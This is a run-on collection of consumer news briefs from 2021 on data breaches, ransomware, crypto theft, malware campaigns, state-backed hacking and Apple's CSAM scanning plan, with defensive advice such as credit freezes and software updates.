Research analysts from security risk platform company UpGuard first uncovered the issue in May when they found unprotected data from several Microsoft Power Apps portals online.

After investigating the matter further, UpGuard sent a vulnerability report to Microsoft in late June. The researchers showed what specific pieces of data were accessible and made suggestions about what Microsoft could do to disable anonymous access to it. 

By mid-July, Microsoft said it had the situation under control and that most of the data from the Power Apps portals had been made private.

Indiana consumers luck out 

In the Indiana Department of Health’s (IDOH) situation alone, there were nearly 750,000 Hoosiers whose data from the state’s COVID-19 online contact tracing survey was accessed. The information supposedly included names, addresses, emails, genders, ethnicities and races, and dates of birth.

While that might seem dire, those people were actually pretty lucky. According to an announcement made by the state, it was able to get the company that accessed the data to sign a “certificate of destruction.” The agreement confirms that the data was not released to any other entity and was destroyed by the company.

“We believe the risk to Hoosiers whose information was accessed is low. We do not collect Social Security information as a part of our contact tracing program, and no medical information was obtained,” said State Health Commissioner Kris Box, M.D., FACOG. “We will provide appropriate protections for anyone impacted.”

T-Mobile said Friday that the data breach it disclosed earlier this week affected significantly more people than initially believed. 

In a filing with the Securities and Exchange Commission, the carrier said an additional 5.3 postpaid accounts and 850,000 active T-Mobile prepaid accounts were affected. This brings the total number of affected consumers to more than 54 million. 

On Wednesday, the company confirmed that hackers were able to access data on 7.8 million of its postpaid customers, along with the records of 40 million former and prospective customers. 

Information stolen included customers’ first and last names, dates of birth, Social Security numbers, and driver’s license/ID information. In its latest filing with the SEC, the carrier said phone numbers and IMEI and IMSI details (identifiers for mobile devices and SIM cards respectively) were also compromised.

Mitigating the impact

T-Mobile maintained that it has "no indication" that affected customers’ financial details were exposed. The company said its investigation into the breach is ongoing, and more details will be provided as they’re uncovered. 

T-Mobile emphasized that it’s "confident” that it has successfully “closed off the access and egress points the bad actor used in the attack.” 

The company said it has notified affected account holders and taken steps to safeguard accounts. Customers who think they may have been affected are being offered two years of identity protection services. 

Although no accounts PINs were compromised, T-Mobile has recommended that all postpaid customers proactively change their PIN by going online into their T-Mobile account or calling the Customer Care team by dialing 611 on their phone.

T-Mobile says its investigation of a breach of its network shows that hackers were able to access data on 7.8 million of its postpaid customers, along with the records of 40 million former and prospective customers.

“We were able to verify that a subset of T-Mobile data had been accessed by unauthorized individuals,” the company said in a statement. “We also began coordination with law enforcement as our forensic investigation continued. While our investigation is still underway and we continue to learn additional details, we have now been able to confirm that the data stolen from our systems did include some personal information.”

The company said the access point used by the hacker was located and closed. It said no financial or credit card information was compromised. However, officials confirmed that hackers apparently stole customers’ first and last names, dates of birth, Social Security numbers, and driver’s license/ID information. In short, criminals obtained the information needed to steal customers’ identities.

T-Mobile offers assistance to compromised customers

T-Mobile said it is taking the following steps to support customers whose data may have been compromised:

• Immediately offering 2 years of free identity protection services with McAfee’s ID Theft Protection Service.

• Recommending all T-Mobile postpaid customers proactively change their PIN by going online into their T-Mobile account or calling the Customer Care team by dialing 611 on their phone. This precaution is being taken despite the fact that we have no knowledge that any postpaid account PINs were compromised.

• Offering an extra step to protect mobile accounts with Account Takeover Protection capabilities for postpaid customers, which makes it harder for customer accounts to be fraudulently ported out and stolen.

• Publishing a unique web page later on Wednesday for one-stop information and solutions to help customers take steps to further protect themselves. 

T-Mobile said it was also able to confirm that approximately 850,000 active T-Mobile prepaid customer names, phone numbers, and account PINs were compromised in the breach. 

“We have already proactively reset all of the PINs on these accounts to help protect these customers, and we will be notifying accordingly right away,” T-Mobile said. “No Metro by T-Mobile, former Sprint prepaid, or Boost customers had their names or PINs exposed.”

Other steps consumers can take

T-Mobile customers affected by the breach may also take other steps to prevent identity theft. The first step should be placing a freeze on credit reports maintained by Experian, Equifax, and Transunion.

The freeze should be placed with all three companies. Someone using a stolen Social Security number will not be able to open new credit accounts as long as the freeze is in place. Fortunately, the process has gotten less complicated over the years. Here are the links to freeze credit information at the three companies:

• Equifax

• Experian

• TransUnion

Freezing credit reports prevents a criminal from opening a credit account in your name, but it prevents you from doing so as well. All three credit agencies make it possible to establish a PIN or password so that your credit can be unfrozen when you are applying for a loan or credit account.

Cryptocurrency platform Poly Network has offered a job to the hacker who stole nearly $600 million in cryptocurrency tokens from it.

A hacker known as “The White Hat” recently made off with a massive amount of crypto, only to later return most of it. The perpetrator claimed that they stole the funds “for fun” and that it was “always the plan” to return the assets. However, some speculated that the hacker either feared legal consequences or realized how difficult it would be to launder such a large amount of stolen crypto. 

Poly Network has since invited the hacker to become an advisor to the firm. It has also promised a $500,000 “bug bounty” reward in exchange for providing the password needed to retrieve more than $200 million in stolen funds. 

In a message embedded in a transaction last week, an anonymous person claiming to be the perpetrator said they would "PROVIDE THE FINAL KEY WHEN _EVERYONE_ IS READY,” but that hasn’t happened yet. 

Retrieving the remaining funds

On Monday, the hacker said they were “considering taking the bounty as a bonus for public hackers if they can hack the Poly Network.” Poly Network said its offer of a $500,000 reward to “Mr. White Hat'' is still on the table. It also said the hacker could have a role as its “chief security advisor.” 

“To extend our thanks and encourage Mr. White Hat to continue contributing to security advancement in the blockchain world together with Poly Network, we cordially invite Mr. White Hat to be the Chief Security Advisor of Poly Network,” the firm said in a statement.

The platform said it has no plans to levy legal charges against Mr. White Hat. On the contrary, it plans to use what it’s learned from the attack to bolster its security measures. The firm said Tuesday that it hopes to implement a “significant system upgrade” to prevent future incidents. However, it says it can’t do so until the remaining funds are returned. 

Computers owned by Memorial Health System were hit by an attack from the Hive ransomware group on Sunday, causing a system outage. Memorial Health announced that it suffered “an information technology security incident in the early morning hours this morning, August 15, 2021.” 

“As a result, we suspended user access to information technology applications related to our operations,” the non-profit health system said in a statement. 

The company is still struggling to get operations back to normal. In the meantime, medical personnel have been forced to rely on paper records and cancel radiology exams and non-urgent surgical cases. The organization said it didn’t believe patient records were stolen in the attack. 

"At this time no known patient or employee personal or financial information has been compromised," said Memorial Health System president and CEO Scott Cantley. "We are continuing to work with IT security experts to methodically investigate to precisely understand what happened and are taking the appropriate actions to resolve any and all issues."

Hive ransomware group

Memorial Health System represents 64 clinics, including the Marietta Memorial, Selby General, and Sistersville General hospitals in the Marietta-Parkersburg metropolitan area in West Virginia and Ohio. 

The party that carried out the attack is allegedly the Hive ransomware gang, a group that began targeting businesses this summer. Although Memorial Health officials said they didn’t believe any information was compromised, Hive typically links to data stolen from its victims. 

“Like most ransomware gangs, Hive has a leak site called HiveLeaks and hosted on the dark web, where they published links to data stolen from almost two dozen victims that did not pay the ransom,” reported Bleeping Computer. “Most of the businesses listed on the leak site appear to be small to medium sized, many having around or less than 100 employees.”

Apple has released new details about its plan to scan consumers’ devices for evidence of child sexual abuse material (CSAM). Following criticism of the idea, Apple now says it will only flag images that have been supplied by clearinghouses in multiple countries. 

Ten days ago, Apple first announced its plan to monitor images stored on iCloud Photos to search for matches of previously identified CSAM. Once Apple’s technology finds a match, a human will review the image. If that person confirms that the image qualifies as CSAM, the National Center for Missing and Exploited Children (NCMEC) would be notified and the user's account would be immediately disabled. 

Apple said its main goal in employing the technology is to protect children from predators. However, critics were concerned that the tech could be exploited by authoritarian governments or used by malicious parties to open a “backdoor” for wider surveillance. 

“While child exploitation is a serious problem, and while efforts to combat it are almost unquestionably well-intentioned, Apple's proposal introduces a backdoor that threatens to undermine fundamental privacy protections for all users of Apple products,” security and tech privacy advocates said in a letter pushing for Apple to rescind its plan. 

New details 

In an effort to ease privacy fears, Apple now says it will tune the system so that it will only flag images supplied by clearinghouses in multiple countries -- not just by the U.S. National Center for Missing and Exploited Children (NCMEC), as announced earlier.

Additionally, only cases where users had about 30 or more potentially illicit pictures will be flagged for human review. If proven legitimate, authorities will be notified about the presence of CSAM in a person’s iCloud library. 

“We expect to choose an initial match threshold of 30 images,” Apple said in a Security Threat Model Review published Friday.

“Since this initial threshold contains a drastic safety margin reflecting a worst-case assumption about real-world performance, we may change the threshold after continued empirical evaluation of NeuralHash false positive rates – but the match threshold will never be lower than what is required to produce a one-in-one trillion false positive rate for any given account.”

Privacy concerns still present

Privacy advocates have argued that there’s no tweak that would render Apple’s CSAM surveillance system completely safe from exploitation or abuse. 

“Any system that allows surveillance fundamentally weakens the promises of encryption,” the Electronic Frontier Foundation’s Erica Portnoy said Friday. “No amount of third-party auditability will prevent an authoritarian government from requiring their own database to be added to the system.”

Apple has maintained that the technology will not scan users’ iCloud updates for anything other than CSAM material. Any government requests to “add non-CSAM images to the hash list” would be rejected, the company added. 

T-Mobile says it is investigating a hacker’s claim that they breached the carrier’s network and stole personal data on all 100 million of the its U.S. customers.

Motherboard, a tech site, reported over the weekend that a hacker boasted on a forum that they had gained access to data from T-Mobile servers and that the information is for sale. The dataset reportedly includes names, addresses, phone numbers, and Social Security numbers.

The hacker told Motherboard that the information was obtained through a breach of T-Mobile’s network, and Motherboard said it verified that some of the data it reviewed was related to T-Mobile customers. 

T-Mobile confirms it is investigating

On Sunday, T-Mobile confirmed that it has launched an investigation to determine whether the report is accurate. 

"We are aware of claims made in an underground forum and have been actively investigating their validity,” T-Mobile said in a brief statement to Motherboard. “We do not have any additional information to share at this time." 

Motherboard quotes the hacker as saying T-Mobile is apparently aware of the breach because the hacker can no longer gain access to the servers. In the meantime, the hacker is reportedly selling about 30 million Social Security and driver’s license numbers for six bitcoins, or about $270,000. 

What to do

T-Mobile customers should take steps to prevent identity theft if their personal information is obtained by other criminals. The first step should be placing a freeze on credit reports maintained by Experian, Equifax, and Transunion.

The freeze should be placed with all three companies. Someone using a stolen Social Security number will not be able to open new credit accounts as long as the freeze is in place. Fortunately, the process has gotten less complicated over the years. Here are the links to freeze credit information at the three companies:

• Equifax

• Experian

• TransUnion

Freezing credit reports prevents a criminal from opening a credit account in your name, but it prevents you from doing so as well. All three credit agencies make it possible to establish a PIN or password so that credit can be unfrozen when you are applying for a loan or credit account.

An as-yet-unidentified hacker has returned nearly all of the $600 million stolen by exploiting a vulnerability in the cryptocurrency platform Poly Network. The firm cited the anonymous person claiming to be the perpetrator as saying they were “ready to return” the rest of the stolen digital currency. 

Almost all of the funds have been returned to three digital currency wallets, but $268 million in assets is currently locked in an account that requires passwords from both Poly Network and the hacker. 

“It’s likely that keys held by both Poly Network and the hacker would be required to move the funds — so the hacker could still make these funds inaccessible if they chose to,” Tom Robinson, chief scientist of blockchain analytics firm Elliptic, said in a blogpost Friday.

In a message embedded in the transaction, the hacker said they would "PROVIDE THE FINAL KEY WHEN _EVERYONE_ IS READY.”

Motivation unclear

At this point, it’s still unclear why the hacker decided to return the funds. Some analysts believe the move was motivated by the fact that it’s challenging to launder and cash out large amounts of stolen cryptocurrency. 

“I think this demonstrates that even if you can steal cryptoassets, laundering them and cashing out is extremely difficult, due to the transparency of the blockchain and the use of blockchain analytics,” Robinson told CNBC earlier this week. “In this case the hacker concluded that the safest option was just to return the stolen assets.”

Others have speculated that the hacker was afraid of being exposed and facing legal consequences. The identity of the hacker, who is known as “White Hat,” has yet to be uncovered. However, cybersecurity researchers say the individual left behind numerous “digital breadcrumbs” on the blockchain that could be traced by law enforcement.

According to CNBC, the hacker claimed in a message that they stole the funds “for fun” and that it was “always the plan” to return the funds. Poly Network has described the hack as “the biggest in defi history.” 

NortonLifeLock and Avast have announced that they’ll be merging to create a larger cybersecurity company. The deal will be worth between $8.1 billion and $8.6 billion, the companies said Tuesday. 

“With this combination, we can strengthen our cyber safety platform and make it available to more than 500 million users,” says Vincent Pilette, NortonLifeLock CEO. “We will also have the ability to further accelerate innovation to transform cyber safety.”

Once the merger is completed, the firm will likely release antivirus products that encompass the benefits of Avast’s focus on privacy and NortonLifeLock’s experience in identity. 

Joining forces

The merger comes at a time of heightened focus on cybersecurity. Ransomware attacks on large companies and infrastructure firms have received attention lately, in terms of both size and frequency. High-profile cases have underscored the need for software effective in guarding against hackers. 

The CEOs of both companies acknowledged the rise in damaging cyberattacks during the coronavirus pandemic and said partnering would help create products that give consumers and businesses peace of mind. 

“The bad guys have been really, really busy taking advantage of the situation created by Covid-19,” said Avast CEO Ondrej Vlcek, who will become president of the combined company. “The massive increase in attacks has been against everyone -- enterprises, small businesses and consumers. Now is the time to join forces and accelerate the transformation of the entire cybersecurity space.”

On Wednesday, a group of hackers began returning some of the cryptocurrency funds they stole by exploiting a vulnerability in Poly Network, a cryptocurrency platform that facilitates peer-to-peer transactions. 

The hackers recently stole just over $600 million in digital tokens in a cryptocurrency heist that is being regarded as one of the largest in history. Poly Network disclosed the hack on Tuesday and urged the bad actors to “return the hacked assets.” The platform said it planned to take legal action. 

“The amount of money you hacked is the biggest in defi history,” Poly Network said in a tweet. “We will take legal actions and we urge the hackers to return the assets.”

Laundering cryptocurrency is difficult

By Wednesday morning, the hackers had returned around $4.8 million in tokens. A few hours later, about $258 million had been returned. Experts say the hackers may have been motivated not only by Poly’s plea, but by the challenge of laundering stolen crypto on such a large scale. 

“I think this demonstrates that even if you can steal cryptoassets, laundering them and cashing out is extremely difficult, due to the transparency of the blockchain and the use of blockchain analytics,” Tom Robinson, chief scientist of blockchain analytics firm Elliptic, told CNBC. “In this case the hacker concluded that the safest option was just to return the stolen assets.”

In an open letter to Apple, thousands of security and tech privacy advocates pushed back against Apple’s plan to scan iPhones for images of child sexual abuse. 

Apple recently announced a plan to use technology capable of searching for matches of “Child Sexual Abuse Material (CSAM)” in images stored on iCloud. The company claimed the accuracy of its system “ensures less than a one in one trillion chance per year of incorrectly flagging a given account.” 

But as of Monday evening, nearly three dozen organizations and over 6,600 individuals (ranging from cryptographers and researchers to security and legal experts) had signed the open letter urging Apple not to go through with its plan to use the tech.

Critics cite privacy risks 

Apple said last week that it’s main goal in employing the system was to “protect children from predators.” The company said user privacy would be kept at the forefront. 

“Instead of scanning images in the cloud, the system performs on-device matching using a database of known CSAM image hashes provided by NCMEC and other child safety organizations,” Apple said in a statement announcing the new policy. “Apple further transforms this database into an unreadable set of hashes that is securely stored on users’ devices.”

However, critics argue that the system could be exploited by authoritarian governments or even make it possible for malicious parties to open a “backdoor” for wider surveillance. 

“While child exploitation is a serious problem, and while efforts to combat it are almost unquestionably well-intentioned, Apple's proposal introduces a backdoor that threatens to undermine fundamental privacy protections for all users of Apple products,” the letter reads.

The signatories request that Apple table its proposed policy and issue a statement “reaffirming their commitment to end-to-end encryption and user privacy.”

“Apple's current path threatens to undermine decades of work by technologists, academics and policy advocates towards strong privacy-preserving measures being the norm across a majority of consumer electronic devices and use cases,” the letter said. “We ask that Apple reconsider its technology rollout, lest it undo that important work.”

Apple says that it plans to scan iPhones for images of child sexual abuse. The plan received a warm welcome from child protection groups but caused concern with security researchers who worry that Apple’s intention could be exploited by authoritarian governments wanting to play Big Brother and spy on their citizens.

The technology Apple is employing will monitor images stored on iCloud Photos, searching for matches of previously identified “Child Sexual Abuse Material (CSAM),” the new, preferred term over “child pornography.” The company claims its system is so accurate that it “ensures less than a one in one trillion chance per year of incorrectly flagging a given account.” 

When the system lands on a match, a human will review the image. If that person confirms that the image qualifies as CSAM, the National Center for Missing and Exploited Children (NCMEC) will be notified and the user's account will be immediately disabled. 

Apple said forthcoming versions of iOS and iPadOS set for release later this year will contain "new applications of cryptography to help limit the spread of CSAM online, while designing for user privacy." Even though most Apple users don’t give much thought to cryptography, Apple already applies it, mostly in Safari, to regularly check derivations of a user’s passwords against a publicly available list of breached passwords to keep their account safe and secure.

A Herculean effort and a game-changer

Apple is looking at a monumental task. The NCMEC views over 25 million images a year, and the U.S. is one of the largest producers of these types of images and videos. 

In its analysis, the Canadian Centre for Child Protection stated that 67% of child sexual abuse material survivors are impacted much differently by the distribution of their images than they are by hands-on abuse. 

“The reason for this is tragic; distribution goes on perpetuity, and these images are permanent when they are constantly re-shared,” said Gina Cristiano of ADF Solutions, a mobile and digital forensics company.

"Apple's expanded protection for children is a game changer," said John Clark, the president and CEO of the National Center for Missing and Exploited Children. "With so many people using Apple products, these new safety measures have lifesaving potential for children."

“This will break the dam”

Despite Apple’s good intentions, some privacy experts are concerned that the company is crossing a line.

One of those -- Matthew Green, a cryptography researcher at Johns Hopkins University -- raised concerns that Apple’s system could be deployed to frame innocent people simply by sending the person otherwise innocuous images, but ones created to prompt a match for child pornography, outwit Apple's algorithm, and alert law enforcement. 

"Researchers have been able to do this pretty easily," Green said. "Regardless of what Apple's long term plans are, they've sent a very clear signal. In their (very influential) opinion, it is safe to build systems that scan users' phones for prohibited content," Green said.

Green says this decision could also prompt governments to ask for all sorts of information about their citizens.

"Whether they turn out to be right or wrong on that point hardly matters. This will break the dam — governments will demand it from everyone,” he said. "What happens when the Chinese government says, 'Here is a list of files that we want you to scan for?'" Green asked. "Does Apple say no? I hope they say no, but their technology won't say no."

A new Android-based malware has been found that uses screen recording features to log in and ultimately steal sensitive information from targeted devices.

The malware, dubbed “Vultur” by researchers at Amsterdam-based security firm ThreatFabric, was reportedly distributed through the Google Play Store. It was disguised as an app called “Protection Guard,” which garnered over 5,000 installations. The primary targets were banking and crypto-wallet apps from entities located in Italy, Australia, and Spain.

The researchers said they found that the remote access trojan (RAT) worked by taking advantage of accessibility permissions to capture keystrokes. It leveraged screen recording features to log all activities on the targeted device, enabling it to steal banking credentials and more.

Abuses accessibility services

When Vultur is first installed, it abuses accessibility services built into the mobile operating system in order to obtain the required permissions. It does so by borrowing an overlay from other malware families. After that, it goes to work monitoring all requests that trigger the accessibility services. 

"For the first time we are seeing an Android banking trojan that has screen recording and keylogging as the main strategy to harvest login credentials in an automated and scalable way," researchers from ThreatFabric said.

The researchers said the tactics employed by the bad actors behind Vultur are a deviation from “the common HTML overlay development we usually see in other Android banking Trojans,” which tends to be a more time consuming way to siphon information.

“Instead, they chose to simply record what is shown on the screen, effectively obtaining the same end result,” the team wrote. 

"The story of Vultur shows one more time how actors shift from using rented Trojans (MaaS) that are sold on underground markets towards proprietary/private malware tailored to the needs of this group," the researchers concluded. "These attacks are scalable and automated since the actions to perform fraud can be scripted on the malware backend and sent in the form of commands sequence, making it easy for the actor(s) to hit-and-run."

Apple users are being urged to immediately install an update on their devices to avoid a nasty exploit that could lead to a malicious malware infection.

Thanks to a tip-off from an anonymous researcher, Apple has issued a security update for Mac, iPhone, and iPad users -- iOS 14.7.1, iPadOS 14.7.1, and macOS Big Sur 11.5.1. The company says the update will repair a memory corruption issue that has been proven to allow a malicious app to "execute arbitrary code with kernel privileges." 

That explanation sounds a bit technical, but the company has made it known that the exploit is serious and running rampant.

How to do the update

Some Apple users have likely already received a pop-up notice signaling that an automatic update will be installed later on Tuesday. For those who’d rather not wait, the update process is simple.

For iPhone and iPad users:

1. Update your iOS or iPadOS device by navigating to Settings > General > Software Update. 

2. After that, tap "Download and Install" and the security update will be downloaded and applied.

After that, you should be protected from the malware. 

For Mac users:

1. Open the Apple menu

2. Select System Preferences

3. Click Software Update

4. Then click "Update Now," which will download the latest update and patch your system.

At that point, you should be good to go.

Microsoft sent out an important heads-up to its customers on Friday to warn about malware that’s targeting Windows-based computer systems. This specific threat comes from LemonDuck, a crypto-mining malware that reportedly begins with a single infection and then spreads quickly across a computer network. If left unchecked, it can turn every resource from USB devices to emails into cryptocurrency mining slaves. 

Unfortunately, LemonDuck’s threat doesn’t stop with just Windows users. “It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices,” Microsoft 365’s Defender Threat Intelligence Team warned users in a blog post.

“And, it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.”

The Microsoft 365 team says it is taking this threat seriously because of LemonDuck’s ability to constantly evolve. While the malware is primarily known for its cryptocurrency mining objectives, it has the ability to morph and escalate its insurgence by stealing credentials, removing security controls, spreading via emails, and putting more tools in place to interact with human-operated activities.

Red flags

There’s not much a typical Windows (or Linux) user can do on a network-wide scale, but there are some things everyday users should be aware of if they want to avoid being turned into a LemonDuck victim.

The most important piece of advice is to be vigilant when it comes to emails. Microsoft researchers say LemonDuck’s standard email subjects and body content can include jarring phrases like “The Truth of COVID-19” or seemingly out-of-place phrases like “farewell letter” or “good bye.” 

The team says these phrases are usually meant to elicit a reaction and get you to click on something. When that happens, your device is then infected by the malware. While these words and phrases are one red flag to look out for, there are two other easy ones that you can usually spot right away: poor spelling and suspicious files. 

Spelling mistakes are a common component of many scam messages, so you should beware of any email that is littered with these errors. When it comes to files, Microsoft says many scam emails tend to use .doc, .js, or .zip files that usually have a title like “readme” to entice users into clicking on them. Just make sure you don’t.

Authorities from France warned Wednesday that Chinese hackers are using hacked home and office routers as part of a large and ongoing attack campaign. 

In an advisory, France’s National Agency for Information Systems Security (ANSSI) said a hacking group known as APT31 (sometimes known as Zirconium or Judgment Panda) is using compromised routers to target French organizations. 

“ANSSI is currently handling a large intrusion campaign impacting numerous French entities,” ANSSI warned. “Attacks are still ongoing and are led by an intrusion set publicly referred to as APT31. It appears from our investigations that the threat actor uses a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.”

The advisory did not specify which organizations were targeted in the campaign, but ANSSI said around 160 IP addresses can be used to indicate whether an organization has been a target. 

More scrutiny over supposed China hacking

France joins other foreign governments in accusing Chinese state-backed hackers of malicious cyber activity. Earlier this week, the U.S. and its allies formally accused China of being responsible for the Microsoft Exchange Server hack that compromised the information of numerous organizations. Beijing denied the hacking charges. 

“The United States ganged up with its allies to make unwarranted accusations against Chinese cybersecurity,” said foreign ministry spokesman, Zhao Lijian. “This was made up out of thin air and confused right and wrong. It is purely a smear and suppression with political motives. China will never accept this.” 

Cybersecurity firm Bitdefender has discovered a new form of malware that gets installed through advertisements in search results. The company says the malware specifically targets Windows devices and is being used to steal passwords, install cryptocurrency miners, and deliver additional trojan malware. 

The researchers dubbed the new form of malware MosaicLoader because of “the intricate internal structure that aims to confuse malware analysts and prevent reverse-engineering.” 

Defending yourself

Once delivered into a system via ads, the malware goes to work by downloading a variety of threats. Those threats include the malware Glupteba, which creates a backdoor onto infected systems and could allow bad actors to steal sensitive information. Links to the malware show up at the top of search results posing as cracked installers.

"The best way to defend against MosaicLoader is to avoid downloading cracked software from any source," the researchers said in a whitepaper accompanying the report. "Besides being against the law, cybercriminals look to target and exploit users searching for illegal software.” 

“We recommend always checking the source domain of every download to make sure that the files are legitimate and to keep your antimalware and other security solutions up to date,” the researchers added. 

The team noted that people working from home are more likely to be victims of the scheme because they are more likely to download cracked software. It’s believed that those behind the MosaicLoader operation are aiming to compromise as many Windows machines as possible, so it’s very important for consumers and businesses to take this threat seriously.

"From what we can tell, this new MosaicLoader attempts to infect as many devices as possible, likely to build up market share and then sell access to infected computers to other threat actors," Bogdan Botezatu, director of threat research and reporting at Bitdefender, told ZDNet. 

The European Union (E.U.) says any use of spyware to take advantage of what journalists are communicating on their electronic devices is not only improper but also ill-advised.

The reaction comes after reports by non-profit journalism group Forbidden Stories suggested that Israeli software had been leveraged to break into the smartphones of up to 50,000 journalists, government officials, and rights activists across the globe.

"What we could read so far -- and this has to be verified, but if it is the case -- it is completely unacceptable. Against any kind of rules we have in the European Union," European Commission President Ursula von der Leyen said during a trip to the Czech Republic. 

The Israeli spyware von der Leyen is referring to is called “Pegasus”, and it comes from NSO Group Technologies -- the same cybersecurity intelligence agency that was accused of hacking WhatsApp and installing spyware on users’ phones. Pegasus is especially dangerous because it can allegedly infect phones without a user ever having to click on something.

According to reports, an investigation of the hacked phone numbers revealed that journalists from Al Jazeera, CNN, The Financial Times, the Associated Press, The New York Times, The Wall Street Journal, Bloomberg News, and French newspaper Le Monde were targeted. Amnesty International says potential surveillance targets have also included heads of state, activists, and journalists, including Jamal Khashoggi’s family.

NSO denies involvement

In response, NSO says Forbidden Stories’ report is “full of wrong assumptions and uncorroborated theories.” While defending its own credibility, it did its best to discredit Forbidden Stories, questioning the reliability and interests of the group’s sources. 

“It seems like the ‘unidentified sources’ have supplied information that has no factual basis and are far from reality,” NSO said in a statement posted on its website.

NSO is taking the allegations seriously and says that they’re so outrageous that it's considering a defamation lawsuit. Furthermore, it claims that software like Pegasus is available to “anyone, anywhere, and anytime” and is part of the arsenal of software many governmental agencies and private companies already have in place. 

“We would like to emphasize that NSO sells its technologies solely to law enforcement and intelligence agencies of vetted governments for the sole purpose of saving lives through preventing crime and terror acts. NSO does not operate the system and has no visibility to the data,” the company stated.

“Our technologies are being used every day to break up pedophilia rings, sex and drug-trafficking rings, locate missing and kidnapped children, locate survivors trapped under collapsed buildings, and protect airspace against disruptive penetration by dangerous drones. Simply put, NSO Group is on a life-saving mission, and the company will faithfully execute this mission undeterred, despite any and all continued attempts to discredit it on false grounds.”

On Monday, the Biden Administration, along with governments in Europe and Asia, formally accused China of being behind a string of hacks and cyberattacks in recent months. 

In a coordinated announcement, the U.S. and its foreign allies accused China's Ministry of State Security of using "criminal contract hackers" to carry out malicious cyber activities with the intent of making a profit. The U.S. said China’s MSS used these contract hackers "to conduct unsanctioned cyber operations globally, including for their own personal profit."

"The United States has long been concerned about the People's Republic of China's irresponsible and destabilizing behavior in cyberspace," a senior U.S. administration official said. "Their operations include criminal activities, such as cyber-enabled extortion, crypto-jacking, and theft from victims around the world for financial gain.” 

Large ransom requests

Specifically, the governments blamed China for the hack of Microsoft’s Exchange email server software, which compromised tens of thousands of computers across the globe and gave hackers access to large amounts of sensitive data. 

E.U. policy chief Josep Borrell said in a statement that the hacking was "conducted from the territory of China for the purpose of intellectual property theft and espionage." U.K. Foreign Secretary Dominic Raab said China's actions represent "a reckless but familiar pattern of behavior” and that the Chinese government “must end this systematic cyber sabotage and can expect to be held account if it does not.” 

The U.S. official said China was also behind a ransomware attack against a U.S. target that involved a "large ransom request.” Ransom demands from China have been in the “millions of dollars,” the official added.

No sanctions announced

No punishments against China have been announced, but the U.S. said it has “raised its concerns” with Beijing. 

"The first important piece is the publicly calling out the pattern of irresponsible malicious cyber activity, and doing it with allies and partners,” the official said, adding that the U.S. is "not ruling out further actions to hold (China) accountable."

Separately, four Chinese nationals and residents of China were indicted Monday over "a campaign to hack into the computer systems of dozens of victim companies, universities and government entities in the United States and abroad between 2011 and 2018."

What would our lives be like if Facebook, Twitter, TikTok, and Instagram had never come on the scene? How much time have we given away to our devices that we’ll never get back? How much of our personal data -- where we live, who our friends are, what we eat and drink, what teams we root for, and where we work -- have we given away to data collectors and hackers?

In a new survey from Grand Canyon University, 1,162 people were asked about their opinions on social media data privacy and confessed that while social media often brings them together, it also has some negative side effects. 

The findings

The respondents were asked to assess how safe they feel their data is on social media sites, which social media platforms they trust most and least, and how far they’ve gone to make sure their accounts are secure. 

Some of the more interesting insights included:

Have you been hacked? Close to one-third (32%) of the respondents admitted that they have had their data hacked on a social media site. Who’s the biggest culprit? Facebook, which has been hacked or had its users' data exploited more times than it probably wishes to count.

Have you deleted a social media account because of social media concerns? Here’s where things start to get a bit unnerving. Almost half (48%) of the people surveyed say they’ve deleted a social media account due to privacy concerns.

“With such high rates of deletion for privacy concerns, it is clear that customer privacy and online safety should be a top priority for social media companies who make more money from high numbers of active users,” the researchers said. “For many individuals, the question of whether companies will actually work to improve privacy is very important.”

Do you trust social media? When asked whether they trust social media, it was an even 50/50 split. Half of the respondents said they trust social media (50.3%), while the other half (49.7%) said they don’t. 

Which platforms do you trust the most? The survey takers asked respondents to plot out how much trust they put in social media platforms on a scale of 1-10. While many may not think of YouTube as a standard social media platform, it topped the list with a rating of 6.1. That was followed by Twitter with a score of 5.7. TikTok -- which has been hit by hackers and lawmakers alike -- earned the lowest average trust rating of only 4.3. 

What are you doing to protect yourself on social media? The two most common approaches (59%) that respondents use to stay safe are only connecting with people they know and manually reviewing social media platforms’ privacy settings. Where most social media users leave themselves vulnerable is staying logged into an account after they’ve used it (65%) and not employing unique passwords for social media accounts (55%).

There seems to be no end in sight when it comes to identity theft. The Identity Theft Resource Center (ITRC), a nonprofit organization established to support victims of identity crime, has just released its U.S. data breach findings for the first half of 2021. If what the organization found is true, it’s troubling to say the least -- particularly for businesses.

According to the data breach analysis, publicly reported data breaches shot up by 38% in the second quarter of 2021 alone. Fortunately, the number of individuals impacted -- 52.8 million -- dropped by 20% from the first quarter to the second quarter. 

“The lesson here for businesses is that no organization is too small to be attacked – directly or indirectly in a supply chain attack – and cybercriminals are increasingly organized and strategic in who they attack and what information they want to steal,” James E. Lee, COO of the ITRC, told ConsumerAffairs.

If things continue at the same rate for the rest of the year, the increase in data breaches in 2021 will end with a record-setting number of compromises, exceeding the current all-time record of 1,632 set in 2017. However, the silver lining to that cloud is that the number of people impacted by data compromises would be the lowest since 2014.

Businesses need to do more to protect their customers’ data

Most identity theft cases can be chalked up to phishing attacks, ransomware attacks, and supply chain attacks. While those attacks have created problems for businesses and continue to increase, consumers still need to be concerned even if they’re not being directly targeted. 

“The effects of these hacks will trickle down and have far-reaching consequences for individuals; disruption when it comes to accessing services, a potential increase in the cost of goods as companies increase prices to foot ransom bills, and the likelihood that customer data will be exploited,” Madeleine Hodson, Chief Editor of PrivacySharks, told ConsumerAffairs.

James E. Lee, Chief Operating Officer of the ITRC, agreed with Hodson, saying that businesses need to step up for the sake of their customers’ security. 

“While we are happy that the number of individuals impacted is down, the risk of an identity crime still exists and has real consequences. Businesses need to take actions to make sure they are not collecting too much information since cybercriminals cannot take what organizations do not have,” he told ConsumerAffairs. 

“There is nothing a consumer can do to prevent a data breach, that’s why good cyber-hygiene practices like multifactor authentication and strong, unique passphrases are essential.” 

A group of hackers with ties to the Russian government breached the computer systems of the Republican National Committee (RNC) last week, Bloomberg reported. The hackers are allegedly affiliated with the group Cozy Bear and carried out an attack on Synnex, a company that provides IT services for the RNC.

"Over the weekend, we were informed that Synnex, a third party provider, had been breached. We immediately blocked all access from Synnex accounts to our cloud environment,” RNC chief of staff Richard Walters said in a statement. "Our team worked with Microsoft to conduct a review of our systems and after a thorough investigation, no RNC data was accessed.”

